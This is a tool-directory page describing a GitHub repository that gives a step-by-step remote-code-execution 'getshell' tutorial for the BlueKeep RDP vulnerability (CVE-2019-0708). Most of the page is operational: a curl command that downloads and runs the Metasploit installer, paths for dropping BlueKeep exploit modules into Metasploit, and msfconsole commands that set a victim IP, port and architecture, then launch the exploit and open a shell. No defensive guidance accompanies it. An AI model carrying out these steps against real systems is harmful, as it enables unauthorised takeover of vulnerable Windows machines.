Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-0708-RCE — CVE-2019-0708 RCE远程代码执行getshell教程 | Kitploit
Tools/GitHubGitHub/0x6b7966/cve-2019-0708-rce
Exploit FrameworksVulnerability AnalysisWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHub0x6b7966/cve-2019-0708-rce

CVE-2019-0708-RCE

CVE-2019-0708 RCE远程代码执行getshell教程

View Repository
1116 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-0708-RCE

Kali install update: curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ ./msfinstall

Download the attack suite and place the files into the corresponding msf folders (if files with the same name already exist, simply overwrite them):

rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Exploitation process:

msfconsole

reload_all

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Use set RHOSTS [victim IP] to set the victim IP

Use set RPORT [victim PORT] to set the victim RDP port number

Use set target [ID number] (optional 0-4) to set the victim machine architecture

set target=3

exploit

shell

image

Download Tool